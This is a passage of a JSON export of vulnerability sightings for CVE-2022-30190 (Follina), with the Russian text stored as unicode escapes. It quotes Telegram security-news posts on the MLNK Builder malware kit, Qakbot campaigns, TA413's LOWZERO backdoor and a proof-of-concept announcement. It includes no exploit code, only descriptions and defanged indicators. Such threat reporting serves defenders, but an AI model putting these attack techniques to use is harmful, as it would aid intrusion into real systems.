\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u043b\u0430 \u0444\u0430\u0439\u043b ISO, \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0449\u0438\u0439 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0435 \u041f\u041e.\n\nResecurity \u043f\u0440\u0438\u043f\u0438\u0441\u0430\u043b\u0430 \u044d\u0442\u0443 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044e \u043a TA578, \u043d\u0430\u0447\u0438\u043d\u0430\u044f \u0441 \u043c\u0430\u044f 2020 \u0433\u043e\u0434\u0430. 
\u0410\u043a\u0442\u043e\u0440 \u0440\u0435\u0430\u043b\u0438\u0437\u0443\u0435\u0442 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438 \u043f\u043e \u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u043e\u0439 \u043f\u043e\u0447\u0442\u0435 \u0434\u043b\u044f \u0434\u043e\u0441\u0442\u0430\u0432\u043a\u0438 Ursnif, IcedID, KPOT Stealer, Buer Loader \u0438 BazaLoader, \u0430 \u0442\u0430\u043a\u0436\u0435 Cobalt Strike.\n\n\u041f\u043e \u043c\u043d\u0435\u043d\u0438\u044e \u044d\u043a\u0441\u043f\u0435\u0440\u0442\u043e\u0432 Resecurity, \u0442\u0435\u043a\u0443\u0449\u0438\u0435 \u043a\u043b\u0438\u0435\u043d\u0442\u044b MLNK Builder \u043f\u043e\u043b\u0443\u0447\u0430\u044e\u0442 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u0431\u0435\u0441\u043f\u043b\u0430\u0442\u043d\u043e, \u043d\u043e \u0430\u0432\u0442\u043e\u0440\u044b \u0442\u0430\u043a\u0436\u0435 \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0438 \u0438 \u043f\u0440\u0438\u0432\u0430\u0442\u043d\u0443\u044e \u0432\u0435\u0440\u0441\u0438\u044e \u0434\u043b\u044f \u0443\u0437\u043a\u043e\u0433\u043e \u043a\u0440\u0443\u0433\u0430 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u043e\u043f\u0435\u0440\u0430\u0442\u043e\u0440\u043e\u0432, \u0441 \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0439 \u043b\u0438\u0446\u0435\u043d\u0437\u0438\u0435\u0439 \u043f\u043e \u0446\u0435\u043d\u0435 125 \u0434\u043e\u043b\u043b\u0430\u0440\u043e\u0432 \u0437\u0430 \u0441\u0431\u043e\u0440\u043a\u0443.\n\n\u041e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u043d\u044b\u0439 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442 \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0431\u043e\u0433\u0430\u0442\u044b\u0439 \u0430\u0440\u0441\u0435\u043d\u0430\u043b \u0434\u043b\u044f \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f 
\u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u0444\u0430\u0439\u043b\u043e\u0432, \u0437\u0430\u043c\u0430\u0441\u043a\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u043f\u043e\u0434 Microsoft Word, Adobe PDF, ZIP, JPG/.PNG, MP3 \u0438 \u0434\u0430\u0436\u0435 AVI, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0431\u043e\u043b\u0435\u0435 \u043f\u0440\u043e\u0434\u0432\u0438\u043d\u0443\u0442\u044b\u0435 \u0444\u0443\u043d\u043a\u0446\u0438\u0438 \u0434\u043b\u044f \u0441\u043e\u043a\u0440\u044b\u0442\u0438\u044f \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0439 \u043f\u043e\u043b\u0435\u0437\u043d\u043e\u0439 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0438.\n\n\u0417\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043f\u0440\u0438\u043c\u0435\u043d\u0438\u043b\u0438 \u0442\u0432\u043e\u0440\u0447\u0435\u0441\u043a\u0438\u0439 \u043f\u043e\u0434\u0445\u043e\u0434 \u0434\u043b\u044f \u043e\u0431\u043c\u0430\u043d\u0430 \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c\u043e\u0432 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u044f \u0438 \u0434\u043e\u0441\u0442\u0430\u0432\u043a\u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0439 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0438, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044f \u043a\u043e\u043c\u0431\u0438\u043d\u0430\u0446\u0438\u044e \u0440\u0430\u0441\u0448\u0438\u0440\u0435\u043d\u0438\u0439 \u0438 \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0445 \u0444\u043e\u0440\u043c\u0430\u0442\u043e\u0432 \u0444\u0430\u0439\u043b\u043e\u0432, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0431\u0438\u043d\u0430\u0440\u043d\u044b\u0435 \u0444\u0430\u0439\u043b\u044b Living Off the Land (LOLbins).\n\n\u0421\u0440\u0435\u0434\u0438 \u043d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u0438\u0432\u0430\u044e\u0449\u0438\u0445 LNK 
\u0448\u0442\u0430\u043c\u043c\u043e\u0432 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u041f\u041e Resecurity \u0432\u044b\u0434\u0435\u043b\u044f\u044e\u0442 TA570\u00a0Qakbot\u00a0(Qbot), IcedID, AsyncRAT\u00a0\u0438 Emotet. \u041f\u0440\u0438 \u044d\u0442\u043e\u043c \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u044f\u044f \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044f \u043f\u043e \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044e Qakbot \u0442\u0430\u043a\u0436\u0435 \u0432\u043a\u043b\u044e\u0447\u0430\u043b\u0430 \u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0435 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u044b Word \u0441\u00a0CVE-2022-30190 (Follina).", "creation_timestamp": "2022-07-20T12:07:09.000000Z"}, {"uuid": "588edee4-22c6-4038-b3d1-820876ef143b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/true_secator/2998", "content": "\u0418\u043c\u043f\u0435\u0440\u0438\u044f \u043d\u0430\u043d\u043e\u0441\u0438\u0442 \u043e\u0442\u0432\u0435\u0442\u043d\u044b\u0439 \u0443\u0434\u0430\u0440, \u043f\u0440\u0430\u0432\u0434\u0430 \u043d\u0435\u043f\u043e\u043d\u044f\u0442\u043d\u043e \u0432 \u043a\u0430\u043a\u0443\u044e \u0441\u0442\u043e\u0440\u043e\u043d\u0443.\n\n\u041f\u043e\u0441\u043b\u0435 \u0432\u0441\u0435\u043e\u0431\u0449\u0435\u0433\u043e \u043d\u0435\u0433\u043e\u0434\u043e\u0432\u0430\u043d\u0438\u044f Microsoft \u0432\u0441\u0435 \u0436\u0435 \u043f\u0440\u0438\u0441\u0432\u043e\u0438\u043b\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 Follina \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440 CVE-2022-30190, \u043e\u0446\u0435\u043d\u0438\u0432 \u0435\u0435 \u043d\u0430 7,8 \u0438\u0437 10 \u043f\u043e CVSS. 
\u041e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u043c\u0438 \u0432\u0435\u0440\u0441\u0438\u044f\u043c\u0438 \u043f\u0440\u0438\u0437\u043d\u0430\u043d\u044b Microsoft Office 2013, Office 2016, Office 2019 \u0438 Office 2021, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0432\u044b\u043f\u0443\u0441\u043a\u0438 Professional Plus.\n\n\u0420\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0438 \u043f\u043e\u0434\u0433\u043e\u0442\u043e\u0432\u0438\u043b\u0438 \u0438 \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043b\u0438 \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0435 \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0438 (\u0437\u0434\u0435\u0441\u044c), \u0432\u043a\u043b\u044e\u0447\u0430\u044f \u043e\u0431\u0445\u043e\u0434\u043d\u044b\u0435 \u043f\u0443\u0442\u0438 \u043f\u043e \u043e\u0442\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u044e \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u0430 URL-\u0430\u0434\u0440\u0435\u0441\u043e\u0432 MSDT \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043c\u043e\u0434\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0440\u0435\u0435\u0441\u0442\u0440\u0430 Windows, \u0447\u0442\u043e \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0438\u0432\u0430\u0435\u0442 \u043e\u0442\u043a\u0440\u044b\u0442\u0438\u0435 Microsoft Office \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u043e\u0432 \u0438\u0437 \u0418\u043d\u0442\u0435\u0440\u043d\u0435\u0442\u0430 \u0432 \u0440\u0435\u0436\u0438\u043c\u0435 \u0437\u0430\u0449\u0438\u0449\u0435\u043d\u043d\u043e\u0433\u043e \u043f\u0440\u043e\u0441\u043c\u043e\u0442\u0440\u0430 \u0438\u043b\u0438 Application Guard \u0434\u043b\u044f Office \u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e.\n\n\u041f\u0435\u0440\u0432\u044b\u0435 \u043f\u0440\u0438\u0437\u043d\u0430\u043a\u0438 
\u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u0440\u0435\u0430\u043b\u044c\u043d\u043e\u0441\u0442\u0438 \u0434\u0430\u0442\u0438\u0440\u0443\u044e\u0442\u0441\u044f 12 \u0430\u043f\u0440\u0435\u043b\u044f 2022 \u0433\u043e\u0434\u0430, \u043a\u043e\u0433\u0434\u0430 \u0432 \u0431\u0430\u0437\u0443 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c \u0431\u044b\u043b \u0437\u0430\u0433\u0440\u0443\u0436\u0435\u043d \u0432\u0442\u043e\u0440\u043e\u0439 \u043e\u0431\u0440\u0430\u0437\u0435\u0446, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0431\u044b\u043b \u0437\u0430\u0442\u043e\u0447\u0435\u043d \u043f\u043e\u0434 \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u043e\u0433\u043e \u043a\u043b\u0438\u0435\u043d\u0442\u0430, \u043e \u0447\u0435\u043c \u0441\u0432\u0438\u0434\u0435\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0443\u0435\u0442 \u043d\u0430\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u043d\u0438\u0435 \u043f\u0440\u0438\u0433\u043b\u0430\u0448\u0435\u043d\u0438\u0435 \u043d\u0430 \u0438\u043d\u0442\u0435\u0440\u0432\u044c\u044e.doc \u0432 \u044d\u0444\u0438\u0440 \u0440\u0430\u0434\u0438\u043e Sputnik.\n\n\u041d\u043e \u0432\u0441\u0435 \u044d\u0442\u043e \u043d\u0438\u043a\u0430\u043a \u043d\u0435 \u043c\u0435\u043d\u044f\u0435\u0442 \u0442\u043e\u0433\u043e, \u0447\u0442\u043e Microsoft \u0435\u0449\u0451 21 \u0430\u043f\u0440\u0435\u043b\u044f \u0437\u0430\u043a\u0440\u044b\u043b\u0430 \u043e\u0442\u0447\u0435\u0442 \u0441\u043e \u0441\u0441\u044b\u043b\u043a\u043e\u0439 \u043d\u0430 \u0442\u043e, \u0447\u0442\u043e \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0431\u044b\u043b\u0430 (\u0432\u043e\u0432\u0441\u0435 \u043d\u0435 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430) \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0430 \u0438 \u043d\u0435 
\u043e\u0442\u043d\u043e\u0441\u0438\u0442\u0441\u044f \u043a \u0432\u043e\u043f\u0440\u043e\u0441\u0430\u043c \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438.\n\n\u0412\u043f\u0440\u043e\u0447\u0435\u043c \u0447\u0435\u043c\u0443 \u0443\u0434\u0438\u0432\u043b\u044f\u0442\u044c\u0441\u044f.", "creation_timestamp": "2022-05-31T09:10:03.000000Z"}, {"uuid": "6458d13c-2967-4ea6-9afc-7231b57caa45", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/true_secator/3478", "content": "\u041f\u0440\u043e\u043f\u0440\u0430\u0432\u0438\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0435\u043d\u043d\u0430\u044f \u0445\u0430\u043a\u0435\u0440\u0441\u043a\u0430\u044f \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430 TA413 (\u0442\u0430\u043a\u0436\u0435 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u0430\u044f \u043a\u0430\u043a LuckyCat), \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u0430\u044f \u0441 \u041a\u0438\u0442\u0430\u0435\u043c \u0431\u044b\u043b\u0430 \u0437\u0430\u043c\u0435\u0447\u0435\u043d\u0430 \u0432 \u0430\u0442\u0430\u043a\u0430\u0445 \u043d\u0430 \u041f\u0440\u0430\u0432\u0438\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u043e \u0422\u0438\u0431\u0435\u0442\u0430 \u0432 \u0438\u0437\u0433\u043d\u0430\u043d\u0438\u0438 \u0438\u043b\u0438 \u043a\u0430\u043a \u0435\u0435 \u0435\u0449\u0435 \u043d\u0430\u0437\u044b\u0432\u0430\u044e\u0442 \u0426\u0435\u043d\u0442\u0440\u0430\u043b\u044c\u043d\u043e\u0439 \u0442\u0438\u0431\u0435\u0442\u0441\u043a\u043e\u0439 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0446\u0438\u0435\u0439.\n\n\u0412 \u0440\u0430\u043c\u043a\u0430\u0445 \u0448\u043f\u0438\u043e\u043d\u0441\u043a\u043e\u0439 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438 APT \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438 
\u043d\u0435\u0434\u0430\u0432\u043d\u043e \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0435 \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043a\u0438 \u0432 \u0431\u0440\u0430\u043d\u0434\u043c\u0430\u0443\u044d\u0440\u0435 Sophos \u0438 Microsoft Office (CVE-2022-1040 \u0438 CVE-2022-30190) \u0434\u043b\u044f \u0440\u0430\u0437\u0432\u0435\u0440\u0442\u044b\u0432\u0430\u043d\u0438\u044f \u043d\u0435\u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e\u0433\u043e \u0440\u0430\u043d\u0435\u0435 \u0431\u044d\u043a\u0434\u043e\u0440\u0430 LOWZERO.\n\n\u0412 \u043e\u0441\u043d\u043e\u0432\u043d\u043e\u043c \u0446\u0435\u043b\u044f\u043c\u0438 \u0431\u044b\u043b\u0438 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0438, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0435 \u0441 \u0442\u0438\u0431\u0435\u0442\u0441\u043a\u043e\u0439 \u043e\u0431\u0449\u0438\u043d\u043e\u0439, \u0432 \u0442\u043e\u043c \u0447\u0438\u0441\u043b\u0435 \u0438 \u043f\u0440\u0435\u0434\u043f\u0440\u0438\u044f\u0442\u0438\u044f, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0435 \u0441 \u0442\u0438\u0431\u0435\u0442\u0441\u043a\u0438\u043c \u043f\u0440\u0430\u0432\u0438\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u043e\u043c \u043e \u0447\u0435\u043c \u0433\u043e\u0432\u043e\u0440\u0438\u0442\u0441\u044f \u0432 \u043e\u0442\u0447\u0435\u0442\u0435 Recorded Future.\n\n\u0410\u0442\u0430\u043a\u0438 LuckyCat \u043d\u0430 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0438 \u0438 \u043e\u0442\u0434\u0435\u043b\u044c\u043d\u044b\u0445 \u043b\u0438\u0446, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0445 \u0441 \u0442\u0438\u0431\u0435\u0442\u0441\u043a\u0438\u043c \u0441\u043e\u043e\u0431\u0449\u0435\u0441\u0442\u0432\u043e\u043c, \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u044e\u0442\u0441\u044f \u043f\u043e \u043a\u0440\u0430\u0439\u043d\u0435\u0439 \u043c\u0435\u0440\u0435 \u0441 2020 \u0433\u043e\u0434\u0430 \u0441 
\u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c, \u0442\u0430\u043a\u0438\u0445 \u043a\u0430\u043a ExileRAT, Sepulcher \u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u0440\u0430\u0441\u0448\u0438\u0440\u0435\u043d\u0438\u044f \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u0430 Mozilla Firefox, \u043f\u043e\u043b\u0443\u0447\u0438\u0432\u0448\u0435\u0433\u043e \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435 FriarFox .\n\n\u0412 \u0446\u0435\u043b\u0435\u0432\u043e\u0439 \u0444\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u043e\u0439 \u0430\u0442\u0430\u043a\u0435 \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u043b\u0441\u044f \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 RTF-\u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442, \u0432 \u043a\u043e\u0442\u043e\u0440\u043e\u043c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438\u0441\u044c \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043a\u0438 \u0432 \u0440\u0435\u0434\u0430\u043a\u0442\u043e\u0440\u0435 Microsoft Equation Editor \u0434\u043b\u044f \u0434\u043e\u0441\u0442\u0430\u0432\u043a\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u043e\u0433\u043e \u0438\u043c\u043f\u043b\u0430\u043d\u0442\u0430\u0442\u0430 LOWZERO. 
\u0412 \u0441\u043e\u0432\u043e\u043a\u0443\u043f\u043d\u043e\u0441\u0442\u0438 \u044d\u0442\u043e \u0431\u044b\u043b\u043e \u0434\u043e\u0441\u0442\u0438\u0433\u043d\u0443\u0442\u043e \u0437\u0430 \u0441\u0447\u0435\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0430 Royal Road RTF, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0448\u0438\u0440\u043e\u043a\u043e \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d \u0441\u0440\u0435\u0434\u0438 \u043a\u0438\u0442\u0430\u0439\u0441\u043a\u0438\u0445 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u0432.\n\n\u0412 \u0434\u0440\u0443\u0433\u043e\u043c \u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u043e\u043c \u043f\u0438\u0441\u044c\u043c\u0435, \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u043d\u043e\u0439 \u0442\u0438\u0431\u0435\u0442\u0441\u043a\u043e\u0439 \u0436\u0435\u0440\u0442\u0432\u043e\u0439 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u043e\u0441\u044c \u0432\u043b\u043e\u0436\u0435\u043d\u0438\u0435 Microsoft Word, \u0440\u0430\u0437\u043c\u0435\u0449\u0435\u043d\u043d\u043e\u0435 \u0432 \u0441\u043b\u0443\u0436\u0431\u0435 Google Firebase, \u043a\u043e\u0442\u043e\u0440\u043e\u0435 \u043f\u044b\u0442\u0430\u043b\u043e\u0441\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Follina \u0434\u043b\u044f \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u043c\u0430\u043d\u0434\u044b PowerShell \u0441 \u043f\u043e\u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0439 \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u043e\u0439 \u0431\u044d\u043a\u0434\u043e\u0440\u0430 \u0441 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e 
\u0441\u0435\u0440\u0432\u0435\u0440\u0430.\n\n\u0411\u044d\u043a\u0434\u043e\u0440 LOWZERO \u0438\u043c\u0435\u0435\u0442 \u043c\u043e\u0434\u0443\u043b\u044c\u043d\u0443\u044e \u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0443 \u0438 \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0435\u0442 \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u044b\u0435 \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u043d\u044b\u0435 \u043c\u043e\u0434\u0443\u043b\u0438 \u0441 C2, \u0435\u0441\u043b\u0438 \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u0430\u044f \u043c\u0430\u0448\u0438\u043d\u0430 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0438\u043d\u0442\u0435\u0440\u0435\u0441 \u0434\u043b\u044f \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430.\n\n\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c \u0443\u0434\u0430\u043b\u043e\u0441\u044c \u0441\u0432\u044f\u0437\u0430\u0442\u044c \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0439 \u0441 \u0434\u0435\u044f\u0442\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u044c\u044e \u0433\u0440\u0443\u043f\u043f\u044b \u0438\u0437-\u0437\u0430 \u0442\u043e\u0433\u043e, \u0447\u0442\u043e \u0441\u0443\u0431\u044a\u0435\u043a\u0442\u044b \u0443\u0433\u0440\u043e\u0437\u044b \u0440\u0435\u0433\u0443\u043b\u044f\u0440\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438 \u043e\u0434\u043d\u0438 \u0438 \u0442\u0435 \u0436\u0435 \u0430\u0434\u0440\u0435\u0441\u0430 \u043e\u0442\u043f\u0440\u0430\u0432\u0438\u0442\u0435\u043b\u0435\u0439 \u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u043e\u0439 \u043f\u043e\u0447\u0442\u044b \u0432 \u0442\u0435\u0447\u0435\u043d\u0438\u0435 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u0438\u0445 \u043b\u0435\u0442 (\u0442\u0430\u043a\u0438\u0435 
\u043a\u0430\u043a tseringkanyaq@yahoo[.]com \u0438 mediabureauin@gmail[.]com).\n\n\u0421\u043e \u0441\u043b\u043e\u0432 \u044d\u043a\u0441\u043f\u0435\u0440\u0442\u043e\u0432, \u0433\u0440\u0443\u043f\u043f\u0430 \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0435\u0442 \u0432\u043d\u0435\u0434\u0440\u044f\u0442\u044c \u043d\u043e\u0432\u044b\u0435 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0438, \u043f\u043e\u043b\u0430\u0433\u0430\u044f\u0441\u044c \u043f\u0440\u0438 \u044d\u0442\u043e\u043c \u043d\u0430 \u043f\u0440\u043e\u0432\u0435\u0440\u0435\u043d\u043d\u044b\u0435 \u043f\u0440\u0430\u043a\u0442\u0438\u043a\u043e\u0439 TTP.", "creation_timestamp": "2022-09-27T16:57:07.000000Z"}, {"uuid": "feed85d9-e3ba-4883-b94b-4edea94de93c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "Telegram/YfHS_0gw6mIFdSry5hyGG3ScC-HwbDfpqg-NLNfkx1fDKy8", "content": "", "creation_timestamp": "2022-06-14T02:39:12.000000Z"}, {"uuid": "d1825c9f-ef91-4a01-a640-679c2d8d74b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/reverse_dungeon/2018", "content": "\ud83d\udcc3 \u042d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f MSDT 0-Day (CVE-2022-30190)\n \n\u0412\u0447\u0435\u0440\u0430 \u043f\u043e\u044f\u0432\u0438\u043b\u043e\u0441\u044c \u0431\u0443\u0440\u043d\u043e\u0435 \u043e\u0431\u0441\u0443\u0436\u0434\u0435\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442\u0435 Microsoft Windows Support Diagnostic Tool (MSDT), \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0435\u0439 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c 
\u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434 \u043d\u0430 \u043c\u0430\u0448\u0438\u043d\u0435 \u0436\u0435\u0440\u0442\u0432\u044b \u043f\u0440\u0438 \u043e\u0442\u043a\u0440\u044b\u0442\u0438\u0438 \u0444\u0430\u0439\u043b\u0430, \u0442\u0430\u043a\u043e\u0433\u043e \u043a\u0430\u043a Word.\n\n\u041d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0435 \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u0441\u043c\u043e\u0442\u0440\u0438\u0442\u0435 \u0432 \u0431\u043b\u043e\u0433\u0435 \u0414\u0436\u043e\u043d\u0430 \u0425\u0430\u043c\u043c\u043e\u043d\u0434\u0430, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0441\u043c\u043e\u0442\u0440\u0438\u0442\u0435 \u0432\u0438\u0434\u0435\u043e \u043e\u0442 \u043d\u0435\u0433\u043e, \u0441 \u043f\u043e\u044f\u0441\u043d\u0435\u043d\u0438\u0435\u043c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0438 \u043f\u0440\u0438\u043c\u0435\u0440\u043e\u043c \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438. 
